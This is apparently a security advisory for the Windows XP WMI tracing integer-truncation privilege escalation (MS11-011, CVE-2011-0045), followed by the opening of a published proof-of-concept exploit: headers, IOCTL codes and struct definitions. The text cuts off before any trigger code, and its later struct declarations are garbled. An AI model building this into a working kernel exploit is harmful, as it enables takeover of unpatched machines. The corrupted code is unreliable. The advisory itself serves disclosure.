Affected Versions:
Microsoft Windows XP Tablet PC Edition SP3
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Service Pack 3 0
Microsoft Windows XP Professional SP3
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP3
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Vulnerability description:
Windows is a very popular operating system released by Microsoft.
The Windows kernel contains a local privilege escalation vulnerability. An attacker holding only minimal local privileges can exploit it to execute arbitrary code and take complete control of the affected computer.
The vulnerability lies in the kernel's support for event tracing. Because of an incorrect (truncating) integer conversion, the kernel allocates a buffer using a truncated length derived from user-supplied data; when that buffer is filled, the kernel uses a different, untruncated length, overflowing the buffer. The result is memory corruption and arbitrary code execution.
Reference:
http://www.zerodayinitiative.com/advisories/ZDI-11-064/
The following test code is provided:
/*
# Exploit Title: MS11-011 (CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC
# Date: 2011-03-01
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link:
# Version: prior to MS11-011
# Tested on: Win XP SP3
# CVE: CVE-2011-0045
# Status: Patched
# Binary Analysis: http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
*/
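#include <windows.h>
#include <stdio.h>
#include <conio.h>
#include <strsafe.h>
#include <wmistr.h>
#include <evntrace.h>

/* WMI device function codes; combined with CTL_CODE below to form the IOCTLs. */
#define WmiTraceMessageCode 40
#define WmiCreateUMLogger   84
#define WmiStartLoggerCode  32

/*
 * CTL_CODE comes from <windows.h>. Its reference expansion, kept only as
 * documentation of how the values below are composed:
 *   ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method)
 * METHOD_NEITHER means the kernel receives raw user-mode pointers for this
 * request, so every length it derives from them has to be validated by the
 * driver itself.
 */
#define IOCTL_WMI_TRACE_MESSAGE \
    CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode, METHOD_NEITHER, FILE_WRITE_ACCESS)
#define IOCTL_WMI_CREATE_UM_LOGGER \
    CTL_CODE(FILE_DEVICE_UNKNOWN, WmiCreateUMLogger, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_WMI_START_LOGGER \
    CTL_CODE(FILE_DEVICE_UNKNOWN, WmiStartLoggerCode, METHOD_BUFFERED, FILE_ANY_ACCESS)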
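/*
 * Native NT counted-string types, declared locally (presumably to avoid
 * pulling in winternl.h/ntdef.h). Length and MaximumLength are presumably
 * byte counts, as in the kernel's own definition -- TODO confirm.
 */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;

/*
 * Same layout with a 64-bit Buffer field, so the structure size does not
 * depend on the caller's pointer width.
 */
typedef struct _STRING64 {
    USHORT    Length;
    USHORT    MaximumLength;
    ULONGLONG Buffer;
} STRING64;
typedef STRING64 *PSTRING64;
typedef STRING64 UNICODE_STRING64;
typedef UNICODE_STRING64 *PUNICODE_STRING64;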
//
// WNODE definition
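/*
 * WNODE_HEADER: common header of every WMI data block, mirroring the DDK
 * definition (the anonymous unions/structs require C11 or MSVC extensions).
 */
typedef struct _WNODE_HEADER {
    ULONG BufferSize;               // Size of entire buffer inclusive of this ULONG
    ULONG ProviderId;               // Provider Id of driver returning this buffer
    union {
        ULONG64 HistoricalContext;  // Logger use
        struct {
            ULONG Version;          // Reserved
            ULONG Linkage;          // Linkage field reserved for WMI
        };
    };
    union {
        ULONG         CountLost;    // Reserved
        HANDLE        KernelHandle; // Kernel handle for data block
        LARGE_INTEGER TimeStamp;    // Timestamp as returned in units of 100ns
                                    // since 1/1/1601
    };
    GUID  Guid;                     // Guid for data block returned with results
    ULONG ClientContext;
    ULONG Flags;                    // Flags, see below
} WNODE_HEADER, *PWNODE_HEADER;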
//
// Logger configuration and running statistics. This structure is used
// by WMI.DLL to convert to UNICODE_STRING
//
// Begin_wmikm
Typedef struct _ WMI_LOGGER_INFORMATION {
WNODE_HEADER Wnode; // Had to do this since wmium. h comes later
//
// Data provider by caller
ULONG BufferSize; // buffer size for logging (in
Kbytes)
ULONG MinimumBuffers; // minimum to preallocate
ULONG MaximumBuffers; // maximum buffers allowed
ULONG MaximumFileSize; // maximum logfile size (in MBytes)
ULONG LogFileMode; // sequential, circular
ULONG FlushTimer; // buffer flush timer, in seconds
ULONG EnableFlags; // trace enable flags
LONG AgeLimit; // aging decay time, in minutes
ULONG Wow; // TRUE if the logger started
Under WOW64
Union {
HANDLE LogFileHandle; // handle to logfile
&